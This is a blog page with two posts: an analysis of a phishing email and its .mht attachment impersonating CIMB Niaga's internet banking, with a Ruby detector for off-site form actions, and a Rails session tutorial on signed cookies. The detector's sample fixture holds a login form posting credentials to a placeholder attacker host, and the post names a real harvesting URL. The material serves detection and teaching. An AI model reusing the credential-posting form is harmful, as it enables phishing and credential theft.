Simple analysis of a phishing activity. Case: CIMB Niaga’s “CIMB Clicks”

A few days ago, I got an email from a local bank asking me to update a CIMB Niaga internet banking account profile.
The email sender looks convincing, but wait, I don’t have an account at this bank! Why the hell did they send this to me?

So this triggered my curiosity, and I came up with a simple analysis. Here goes….

First, take a look at a screenie from the email:

Notice the red highlights: the sender address is a real corporate account; check the website domain here.
People will always trust a corporate account, right?

Here’s the interesting part: the email tells me that I have to update my internet banking account (which I don’t have) in order to synchronize it with their new, updated secure system (so they say), and tells me to download a file in order to fill out the new account information.
And if I don’t do it within the next 24 hours, my account will be frozen for security reasons!
“What the fuck? What kind of method is this?”

Getting more curious, I downloaded the file “CIMB Clicks.mht”.

Common people usually open a file straight after it finishes downloading, without knowing what the file might do to their computer; it might be a virus or whatever…. Well, that is foolish.
First you need to know what the extension means. The .mht extension marks an MHTML file (MIME HTML, RFC 2557): a web page saved as a single file, using the same MIME multipart format that email attachments use. HTML itself is the markup language web pages are written in, not a programming language (search for it on Google for a detailed explanation).
The difference between HTML and MHTML is that an .mht file bundles the page together with its resources (images, stylesheets, scripts and so on) inside one file, while a plain .html file only references them.

When I open the file with a double click, the default application that opens it is the web browser.
Here’s a screenie of the opened file:

Whoa! It looks just like the real CIMB Clicks website:

The difference is in the URL (Uniform Resource Locator): look at the red highlights. The page was opened from a file on disk, so the address bar shows a local file path instead of the bank’s address….

This hacking method is known as phishing: an attempt to acquire sensitive information such as usernames or passwords by mimicking a trusted website (internet banking, Facebook, etc.), usually its login form.
Common people usually ignore this…

Then I looked at the source code behind the .mht file to see what would happen if I submitted the form in it.
Look at this screenie:

Look at the highlighted part of the image: when we submit the login information, the browser sends it to “http://www.zaiedcool.com/images/logininfo.php”.
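Reading the source by hand works for one file, but because an MHTML archive is just MIME multipart (as explained above), the same check can be scripted. The Ruby below is an added example written for this post, not the original author’s tooling: it unpacks an .mht file, decodes each part, and flags any <form> inside an HTML part whose action points at a different host than the page itself was saved from, which is exactly the tell in this sample. The embedded archive is constructed for the demo; bank.example and phish.example are placeholder hosts, not the real addresses from the mail.

```ruby
require 'uri'

# Constructed sample .mht (MIME multipart/related, RFC 2557). The hosts are
# placeholders: bank.example stands for the site the page was copied from,
# phish.example for the credential-harvesting server.
MHT_SAMPLE = <<~'MHT'
  From: <Saved by a web browser>
  Subject: CIMB Clicks
  MIME-Version: 1.0
  Content-Type: multipart/related; type="text/html"; boundary="----=_NextPart_000_0000"

  This is a multi-part message in MIME format.

  ------=_NextPart_000_0000
  Content-Type: text/html; charset="utf-8"
  Content-Transfer-Encoding: quoted-printable
  Content-Location: https://bank.example/login

  <html><body>
  <form method=3D"post" action=3D"http://phish.example/images/logininfo.php">
    User ID: <input name=3D"userid">
    Password: <input name=3D"password" type=3D"password">
  </form>
  </body></html>

  ------=_NextPart_000_0000
  Content-Type: image/gif
  Content-Transfer-Encoding: base64
  Content-Location: https://bank.example/logo.gif

  R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7

  ------=_NextPart_000_0000--
MHT

# Parse a header block into {downcased name => value}, unfolding continuation lines.
def parse_headers(block)
  headers = {}
  last = nil
  block.to_s.each_line do |line|
    line = line.chomp
    if line =~ /\A[ \t]/ && last
      headers[last] += ' ' + line.strip
    elsif (m = line.match(/\A([^:]+):\s*(.*)\z/))
      last = m[1].downcase
      headers[last] = m[2]
    end
  end
  headers
end

# Undo the Content-Transfer-Encoding of one part.
def decode_body(body, encoding)
  case encoding.to_s.downcase
  when 'quoted-printable' then body.unpack('M').first
  when 'base64'           then body.unpack('m').first
  else body
  end
end

# List every <form> in a piece of HTML with the URL and method it submits to.
def form_actions(html)
  html.scan(/<form\b[^>]*>/i).map do |tag|
    { action: tag[/\baction\s*=\s*["']?([^"'\s>]+)/i, 1],
      method: (tag[/\bmethod\s*=\s*["']?([a-z]+)/i, 1] || 'get').downcase }
  end
end

# Split an MHTML archive into its parts: location, content type, decoded body, forms.
def mht_parts(mht)
  head, body = mht.split(/\r?\n\r?\n/, 2)
  boundary = parse_headers(head)['content-type'].to_s[/boundary="?([^";]+)"?/i, 1]
  raise ArgumentError, 'not a multipart MHTML file' unless boundary
  chunks = body.to_s.split(/^#{Regexp.escape("--#{boundary}")}/)
  chunks.shift                                      # preamble before the first delimiter
  chunks.pop if chunks.last.to_s.start_with?('--')  # closing "--boundary--" delimiter
  chunks.map do |chunk|
    phead, pbody = chunk.sub(/\A\r?\n/, '').split(/\r?\n\r?\n/, 2)
    h = parse_headers(phead)
    type = h['content-type'].to_s.split(';').first.to_s.strip.downcase
    decoded = decode_body(pbody.to_s, h['content-transfer-encoding'])
    { location: h['content-location'], content_type: type, body: decoded,
      forms: type == 'text/html' ? form_actions(decoded) : [] }
  end
end

def host_of(url)
  URI.parse(url.to_s).host
rescue URI::InvalidURIError
  nil
end

# The phishing tell: a form on a page saved from one host that submits to another.
# Relative actions (no host) are treated as same-origin.
def offsite_forms(parts)
  parts.flat_map do |part|
    next [] unless part[:content_type] == 'text/html'
    page_host = host_of(part[:location])
    part[:forms].select { |f| (t = host_of(f[:action])) && t != page_host }
                .map { |f| f.merge(page: part[:location]) }
  end
end

if __FILE__ == $0
  parts = mht_parts(MHT_SAMPLE)
  parts.each { |p| puts "#{p[:content_type]} #{p[:location]} forms=#{p[:forms].inspect}" }
  offsite_forms(parts).each { |f| puts "page #{f[:page]} submits #{f[:method]} to #{f[:action]}" }
end
```

The form detection is a plain regex over the decoded HTML, so a kit that builds the submit URL in JavaScript or sets the action at runtime would slip past it; treat an empty result as “nothing obvious”, not as a clean bill of health.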

But thankfully, the file “logininfo.php” does not exist. Inside “logininfo.php” probably lies the script that would store my login information (username & password) in the hacker’s database.

So I tried to fetch the file directly from the server with “wget”, and yes, it returned a “404 error”, which means the file “logininfo.php” does not exist:

Note that a 404 at analysis time only says the script is gone now. Phishing kits are routinely dropped into writable directories of compromised legitimate websites and are cleaned up or taken down within hours, so the credentials of anyone who filled in the form earlier may already have been collected.

So who or what is responsible for this?

This could be the person who holds the email account: maybe their PC got infected with a keylogging virus, malware that records every keystroke and sends it back to the hacker.
Where can you get infected with this kind of virus? Porn sites, betting sites, untrusted gaming sites, untrusted Facebook applications, etc.

We can also blame the system: crackers and hackers can break into a vulnerable system, take control of it, and then send broadcast email without the system administrator knowing what’s going on.

There is a simpler possibility too: nothing at the bank needs to be compromised for a mail to carry its address, because SMTP lets the sender put any address in the From header. Whether the bank’s mail servers were really involved is answered by the message headers (the Received chain and the SPF/DKIM results), not by the sender name shown in the mail client.

And lastly, here’s a little “whois” info about “Zaiedcool”, just in case one of the CIMB Niaga guys reads this post:

That is all, folks. I hope this post will be useful to those who read it 🙂

*cheers

Ruby on Rails session: My own best practice !!!

Okay, here’s my first post on a non-human-language topic, so bear with me 😀

So I had some difficulties dealing with Rails sessions a while ago…
After looking for a solution on the net and finding nothing that was really clear and met my requirements,
in the end I ended up at the Rails API and the Rails Guides.

But then again, I have to admit I’m too lazy to read them, so I finally worked my own shit up :))

Here’s what I do:
I need the session value to be available in the whole application. To do that, define a private method in application_controller.rb and register it with helper_method so views can call it too.
For example, in my case I want an invoice session for a cart app.
Here’s what the content of the file might look like:

class ApplicationController < ActionController::Base
  protect_from_forgery
  # Make the private method below callable from views as well as controllers
  helper_method :invoice_session

  private

  # Memoized for the current request; the session holds only the invoice id
  def invoice_session
    @invoice_session ||= session[:invoice_id]
  end
end

Well, I think that’s it. After that you can set the session value in any controller, for example
in the index method of cart_controller.rb, which might look like this:

class CartController < ApplicationController

  def index
    # This is where the value is stored in the session.
    # The key must match the one invoice_session reads (:invoice_id).
    # Store only the record's id: the session is serialized into a cookie
    # on every response, so keep it small and free of anything sensitive.
    # session[:key] = value (e.g. Model.first.field)
    session[:invoice_id] = Invoice.first.id
  end
end

Retrieving the value is then very simple: call the invoice_session method defined earlier in application_controller.rb from any controller or view.
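One thing worth knowing about what session[...] actually does: with the default cookie store, the whole session hash travels to the browser in the session cookie on every request. It is signed with the application secret (secret_token in Rails 3), so the user cannot alter it, but it is not encrypted, so the user can read it, and browsers cap a cookie at roughly 4 KB. That is why storing the invoice id, as above, is the right call, and why nothing secret should ever be put into session. The Ruby below is an added illustration, not Rails’ own code: it re-implements the shape of that signed cookie (base64 of Marshal.dump, two dashes, hex HMAC-SHA1) so the three properties can be seen directly. DEMO_SECRET, COOKIE_LIMIT and the function names are this example’s own. Newer Rails versions also encrypt the cookie, which closes the readability gap but changes nothing about the size limit or the need to keep the secret safe.

```ruby
require 'openssl'

# Constructed secret for the demo only. In Rails this is the application
# secret (secret_token / secret_key_base) and must never be committed or shared.
DEMO_SECRET = 'demo-only-secret-0123456789abcdef0123456789abcdef'
COOKIE_LIMIT = 4096 # browsers drop cookies larger than about 4 KB

def hmac_sha1(secret, data)
  OpenSSL::HMAC.hexdigest(OpenSSL::Digest.new('SHA1'), secret, data)
end

# Constant-time comparison so the signature check cannot be timed byte by byte.
def secure_compare(a, b)
  return false unless a.bytesize == b.bytesize
  a.bytes.zip(b.bytes).inject(0) { |diff, (x, y)| diff | (x ^ y) }.zero?
end

# Serialize the session hash the way a signed cookie store does:
# base64(Marshal.dump(session)) followed by "--" and the hex HMAC over that text.
def build_session_cookie(session, secret)
  data = [Marshal.dump(session)].pack('m0')
  "#{data}--#{hmac_sha1(secret, data)}"
end

# What the browser, or anyone who captures the cookie, can read without the secret:
# the signature only prevents modification, it does not hide the contents.
def peek_session_cookie(cookie)
  data = cookie.split('--', 2).first
  Marshal.load(data.unpack('m0').first)
end

# What the application does on every request: verify first, unmarshal second.
# Marshal.load on unverified bytes would let the client construct arbitrary
# objects, which is why a leaked secret is a remote-code-execution problem.
def load_session_cookie(cookie, secret)
  data, digest = cookie.to_s.split('--', 2)
  return nil unless data && digest && secure_compare(digest, hmac_sha1(secret, data))
  Marshal.load(data.unpack('m0').first)
rescue ArgumentError # malformed base64
  nil
end

def fits_in_cookie?(cookie)
  cookie.bytesize <= COOKIE_LIMIT
end

if __FILE__ == $0
  small = build_session_cookie({ invoice_id: 42 }, DEMO_SECRET)
  puts "cookie: #{small}"
  puts "readable without the secret: #{peek_session_cookie(small).inspect}"
  bloated = build_session_cookie({ invoice: { id: 42, notes: 'x' * 5000 } }, DEMO_SECRET)
  puts "whole record in the session still fits? #{fits_in_cookie?(bloated)}"
end
```

Two things to take from running it: peek_session_cookie recovers the session without the secret, so treat whatever goes into session as visible to the user; and load_session_cookie refuses a cookie whose data was swapped under a valid signature, which is the only thing standing between the user and session[:invoice_id] = someone else's invoice.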

Well, that’s all folks, this is how I did it.
Hope you find it useful.

*cheers